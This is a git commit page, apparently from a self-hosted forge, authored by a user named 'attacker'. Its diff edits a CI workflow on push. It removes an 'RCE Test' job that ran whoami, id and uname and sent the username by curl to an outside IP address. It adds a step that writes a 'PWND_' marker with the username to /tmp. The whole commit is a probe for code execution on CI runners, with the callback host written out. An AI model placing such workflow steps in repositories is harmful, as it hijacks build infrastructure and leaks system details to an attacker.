simple test
Simple Test / test (push) Has been cancelled

This commit is contained in:
attacker
2026-07-28 23:31:30 +00:00
parent 8f91703f4a
commit 7cb9e237b7
+4 -8
View File
@@ -1,12 +1,8 @@
name: RCE Test
name: Simple Test
on: [push]
jobs:
rce:
test:
runs-on: ubuntu-latest
steps:
- name: Execute Command
run: |
whoami
id
uname -a
curl http://202.79.169.91:28016/$(whoami)
- name: Simple Echo
run: echo "PWND_$(whoami)" > /tmp/pwn.txt